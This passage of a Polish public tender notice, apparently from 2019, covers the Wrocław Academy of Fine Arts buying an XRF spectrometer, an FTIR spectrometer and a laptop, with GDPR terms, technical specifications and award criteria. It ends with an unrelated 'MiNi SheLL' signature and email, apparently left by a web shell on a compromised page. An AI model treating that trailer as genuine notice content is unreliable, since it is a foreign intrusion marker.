3 ustawy Pzp?	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;?	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; ?	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;?	posiada Pani/Pan:o	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;o	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych *;o	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **; o	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;?	nie przysługuje Pani/Panu:o	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;o	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;o	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. 2.	Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane zostaną przekazane Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od Wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.3.	Jeżeli w trakcie realizacji umowy nastąpi taka konieczność Zamawiający będzie wymagał podpisania umowy powierzenia danych osobowych.WYJAŚNIENIE: * Skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.**Prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>SPEKTORMETR - RĘCZNY ANALIZATOR FLUORESCENCJI RENTGENOWSKIEJ - 1szt. </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>CZĘŚĆ NR 1 SPEKTORMETR - RĘCZNY ANALIZATOR FLUORESCENCJI RENTGENOWSKIEJ - 1szt. zgodny ze wskazanym poniżej szczegółowym opisem wymaganych parametrów technicznych (specyfikacją techniczną):SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA (SPECYFIKACJA TECHNICZNA)SPEKTROMETR RĘCZNY ANALIZATOR FLUORESCENCJI RENTGENOWSKIEJ WRAZ Z DODATKOWYMI AKCESORIAMILp.	/NAZWA PARAMETRÓWWYMAGANYCH PRZEZ ZAMAWIAJĄCEGO	/SZCZEGÓLOWY OPIS PARAMETRÓW WYMAGANYCH PRZEZ ZAMAWIAJĄCEGO (SPECYFIKACJA TECHNICZNA)1) Elementy (	1.	Zestaw akcesoriów - przystawka do pomiaru w atmosferze helu 2.	Wyświetlacz dotykowy LCD 3.	Wbudowana kamera);2) Detektor (	1.	Materiał grafen 1um2.	Rozdzielczość poniżej 140eV, 250,000 cps Mn K?);3) Zakres analityczny pomiaru (	1.	Zakres analityczny pierwiastków od Sodu (Na) do Uranu (U) - pomiar w atmosferze powietrza2.	Zakres analityczny pierwiastków od fluoru (F) do uranu (U) - pomiar w atmosferze helu);4) Źródło promieniowania (	Rodowe (Rh));5) Zakres regulacji źródła promieniowania (	1.	Napięcie 6kV-50 kV2.	Prąd 5-200 uA3.	250,000 cps Mn K?4.	< 4 W);6) Przebieg wiązki rentgenowskiej (	1.	Pomiar w atmosferze powietrza2.	Pomiar w atmosferze helu);7) Zasilanie spektrometru	Maksymalne zasilanie 50 kV8) Kolimator (	Rozmiar: 3mm i 8mm);9) Filtry(	Biały, czarny, czerwony);10) Łączność (	Wi-fi, Bluetooth, Port USB, Gniazdo karty pamięci, Kabel USB);11) Akumulator - 2szt (	Litowo-jonowyCzas pracy min.4 godziny);12) Opakowanie do bezpiecznego przechowania, transportu (	1.	Odporne na wstrząsy2.	Wodoodporne3.	Wyposażone w kółka);13) Oprogramowanie podstawowe (	1.	Oparte na platformie Windows2.	W języku polskim i angielskim14) Oprogramowanie dodatkowe	1.	Do wykonywania obróbki widm2.	Analiza wyników3.	Kalibracji);15) Kalibracja (	1.	Na pierwiastkach glinokrzemianowych w atmosferze powierza 2.	Na pierwiastkach glinokrzemianowych w atmosferze helu3.	Dla głównych i śladowych pierwiastków w różnych szkłach w szczególności szkło sodowo-krzemionkowe, szkło sodowo-wapniowe, szkło ołowiowe);16) Statywy (stojak) -3szt. (	1.	Nabiurkowy umożliwiający korzystanie ze spektrometru w warunkach laboratoryjnych2.	Przenośny, trójnożny z regulowanymi uchwytami\3.	Stojak umożliwiający pozycjonowanie próbki przy pomiarach z zastosowaniem helu);17) Szkolenie (	Szkolenie w zakresie obsługi urządzenia oraz oprogramowania - minimum 2 dni (16 godzin) dla 4 osób w terminie uzgodnionym z Zamawiającym (całkowity koszt szkoleń ponosi Wykonawca));18) Gwarancja zgodnie z warunkami określonymi we wzorze umowy (	2 lata na spektrometr);19) Dostawa i montaż (	Budynku ASP we Wrocławiu Centrum Sztuk Użytkowych - Centrum Innowacyjności, ul Traugutta 19/21, pokój 216);20) Termin dostawy (	Dostarczenie zgodnie z ofertą - do dnia 10-12-2019r.Dostarczenie zgodnie z ofertą - do dnia 02-12-2019r.).<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>38433000-9, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-12-10<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">CENA RYCZAŁTOWA BRUTTO OFERTY (K1)</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">TERMIN DOSTAWY (K2)</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>PRZENOŚNY SPEKTROMETR PODCZERWIENI (FTIR) - 1szt.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>CZĘŚĆ NR 2 PRZENOŚNY SPEKTROMETR PODCZERWIENI (FTIR) - 1szt.zgodny ze wskazanym poniżej szczegółowym opisem wymaganych parametrów technicznych (specyfikacją techniczną):SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA (SPECYFIKACJA TECHNICZNA)SPEKTROMETR PODCZERWIENI (FTIR) WRAZ Z DODATKOWYMI MODUŁAMILp.	/NAZWA PARAMETRÓWWYMAGANYCH PRZEZ ZAMAWIAJĄCEGO	/SZCZEGÓLOWY OPIS PARAMETRÓW WYMAGANYCH PRZEZ ZAMAWIAJĄCEGO (SPECYFIKACJA TECHNICZNA)1) Zakres spektralny (	min. 4500 - 650 cm-1 (w konfiguracji z komorą pomiarową, optyka KBr));2) Detektor (	DLATGS, pracujący w temperaturze otoczenia);3) Rozdzielczość (	Zdolność rozdzielcza równa lub mniejsza niż 4 cm-1);4) Czułość (	Powyżej 55 000:1 dla testu 1 min., rozdzielczość 4 cm-1, z detektorem standardowym);5) Dokładność liczby falowej (	Mniej niż 0.05 cm-1 przy ,1554 cm-1);6) Precyzja liczby falowej (	powtarzalność <0.0005 cm-1 przy 1,554 cm-1 (odchylenie standardowe dla 10 pomiarów));7) Moduł ATR ( Moduł ATR, jednodobiciowa, diamentowa (kryształ monolityczny, nie klejony z innym kryształem), kryształ wprasowywany, nie wklejany; automatycznie rozpoznawana przez spektrometr. Po zamontowaniu odbywa się automatyczny test sprawdzający min. Stosunek sygnału do szumu; automatyczne zaczytanie podstawowych parametrów pomiarowych. Przystawka pracująca w zakresie spektralnym min. min. 4500-650 cm-1 );8) Moduł refleksyjny (	Moduł refleksyjny, z punktem pomiarowym poza modułem; umożliwiający pomiary bezkontaktowe, wyposażony w kamerę video zapewniającą wizualizację w oprogramowaniu do sterowania spektrometrem obszaru pomiarowego oraz zapisywanie tego obrazu wraz z widmem);9) Moduł do pomiarów rozproszeniowych (	Moduł do pomiarów rozproszeniowych, pracujący w zakresie 300-3200 cm-1, wyposażony we własne automatycznie przestrajalne źródło 750/1100 nm o mocy poniżej 100 mW oraz własny układ detektorowy. Moduł wykonany w obudowie min IP54, waga nie większa niż 1.5 kg. Walizka transportowa dedykowana dla tego modułu);10) Interferometr (	30° interferometr wykorzystujący pozłacane lustra kubiczne, ustawiany na stałe, nie wymagający justowania dynamicznego lub justowania automatycznego.Interferometr bezłożyskowy, bezsmarowy.Komora interferometru, szczelna, osuszana przez wymienne osuszki i trwale odizolowana od układu pomiarowego przez demontowalne okienka KBr.Spektrometr wyposażony w laser diodowy zamiast lasera HeNe);11) Przetwornik ADC (	24 bit dynamiczny zakres);12) Walidacja (	Wewnętrzne koło walidacyjne z odpowiednimi filtrami zapewniające całkowicie automatyczne wykonywanie testów OQ/PQ sprawdzających min: stosunek sygnału do szumu, amplitudę sygnału, powtarzalność pomiarowa, kalibracje spektrometru. Po zakończeniu testu raport powinien być automatycznie zapisywany w pliku PDF);13) Wymagania (	1.	Urządzenie musi zapewniać łatwą mobilność, przenoszenie do rożnych pomieszczeń oraz przewożenie przez personel laboratorium.2.	Masa urządzenia nie więcej niż 7.5 kg (w konfiguracji podstawowej); w zestawie walizka transportowa umożliwiająca pomieszczenie spektrometru i dostarczonych modułów pomiarowych.3.	Wymiary nie większe niż 22 cm x 33 cm x 15 cm, (w konfiguracji z komorą pomiarową) wysoka trwałość mechaniczna (obudowa wykonana z odlewu aluminiowego), odporność na wstrząsy mechaniczne i zmiany temperatury;4.	Osuszki regenerowalne (zapasowe wkłady w zestawie), wymiana osuszek bez odwracania spektrometru oraz rozszczelniania optyki.5.	Możliwość zasilania akumulatorowego zintegrowanego ze spektrometrem;6.	Możliwość podłączenia zewnętrznego panela dotykowego z pełnofunkcjnalnym oprogramowaniem (panel klasy przemysłowej).7.	Automatyczne rozpoznawanie przystawek pomiarowych (ATR, transmisyjna etc.) i automatyczna konfiguracja przyrządu w zależności od zamontowanej przystawki, wymiana przystawek bez używania dodatkowych narzędzi;8.	System automatycznej kontroli (monitoring) elementów składowych urządzenia, wilgotności i wydajności wraz z systemem informującym na panelu spektrometru.Sterownie komputerowe nie wymagające dodatkowych dedykowanych kart - łączność z PC przez standardowy port Ethernet lub USB);14) Źródło promieniowania (	SiC globar, możliwość samodzielnej wymiany przez przeszkolonego użytkownika bez konieczności wizyty serwisu, rozszczelniania optyki czy też obracania spektrometru);15) Wymagane oprogramowanie (	1.	Urządzenie sterowane prze komputer pracujący w systemie Windows.2.	Program obsługi spektrometru, zapewniający min.:3.	Interaktywny asystent pomocy ,,krok po kroku"4.	Pomoc on-line5.	Interaktywny podręcznik spektroskopii FT-IR6.	Menu pomiarowe7.	Procedury wstępnej obróbki danych8.	Opisywanie pasm9.	Porównywanie widm10.	Narzędzia interpretacji widm11.	Przeszukiwanie bibliotek12.	Bibliotekę startowa z ponad 550 widmami13.	Bibliotekę ATR pigentów, żywic, barwników min 500 widm14.	Analizę ilościową (zgodnie z prawem Lambert'a - Beer'a)15.	Analizę ilościowa bazującą na modelach chemometrycznych.16.	Analizę całkującą17.	Funkcje automatyzujące pomiary18.	Tworzenie i uruchamianie własnych makr19.	Dziennik laboratoryjny20.	Predefiniowane raporty wydruków wraz z możliwością ich edycji21.	Łatwy eksport widm do innych formatów22.	Automatyczne procedury testowania spektrometru, 2 poziomy (OQ, PQ)23.	Ciągła kontrola statusu spektrometru24.	Wielopoziomowe zarządzie użytkownikami);16) Dodatkowe wymagania (	Przyrząd fabrycznie nowyUrządzenie posiada certyfikat CE);17) Szkolenie (	Szkolenie w zakresie obsługi urządzenia oraz oprogramowania - minimum 4 dni (32 godziny) dla 4 osób w terminie uzgodnionym z Zamawiającym (całkowity koszt szkoleń ponosi Wykonawca));18) Gwarancjezgodnie z warunkami określonymi we wzorze umowy (	3 lata gwarancji na spektrometr podczerwieni w tym także na moduł ATR i moduł refleksyjny10 lat gwarancji na interferometr10 lat gwarancji na laser półprzewodnikowy10 lat gwarancji na płytkę z kryształem ATR diamentowym5 lat gwarancji na źródło IR2 lata pełnej gwarancji na moduł do pomiarów rozproszeniowych);19) Warunki dostawy ( Dostarczenie zgodnie z niniejszą ofertą - do dnia 10-12-2019 Dostarczenie zgodnie z niniejszą ofertą - do dnia 02-12-2019);20) Dostawa i montaż (	Budynku ASP we Wrocławiu Centrum Sztuk Użytkowych - Centrum Innowacyjności, ul Traugutta 19/21, pokój 216).<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>38433000-9, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-12-10<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">CENA RYCZAŁTOWA BRUTTO OFERTY (K1)</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">TERMIN DOSTAWY (K2)</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>KOMPUTER PRZENOŚNY- 1szt.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>CZĘŚĆ NR 3 KOMPUTER PRZENOŚNY- 1szt.zgodny ze wskazanym poniżej szczegółowym opisem wymaganych parametrów technicznych (specyfikacją techniczną):SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA (SPECYFIKACJA TECHNICZNA) KOMPUTER PRZENOŚNYLp.	/NAZWA PARAMETRÓWWYMAGANYCH PRZEZ ZAMAWIAJĄCEGO/	SZCZEGÓLOWY OPIS PARAMETRÓW WYMAGANYCH PRZEZ ZAMAWIAJĄCEGO (SPECYFIKACJA TECHNICZNA)1) Zastosowanie (	Sterowanie urządzeniami specjalistycznymi);2) Procesor (	64 bit, osiągający wynik nie gorszy niż 7655 pkt. w teście PassMark - CPU Mark; wyniki dostępne na stronie: http://www.cpubenchmark.net na dzień 16.09.2019 r. (w załączeniu SIWZ wydruk ze strony z tej daty));3) Pamięć RAM (	8 GB);4) Interfejsy (	LAN 10/100/1000 Mbps, Wi-Fi, Bluetooth, 3 x USB (w tym min 2 x USB 3.0), 1 x HDMI, 1 x RJ-45);5) Pamięć masowa (	SSD 256 GB);6) Matryca (	15.6", 1920 x 1080 (Full HD));7) Zainstalowany system operacyjny (	Windows 10 Pro PL);8) Waga (	Max. 2,0 kg);9) Ergonomia (	Wydzielona klawiatura numeryczna).<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>30200000-1, 30213100-6<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 14<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">CENA RYCZAŁTOWA OGÓŁEM BRUTTO OFERTY (K1)</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">GWARANCJA - OKRES W LATACH (K2) </td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com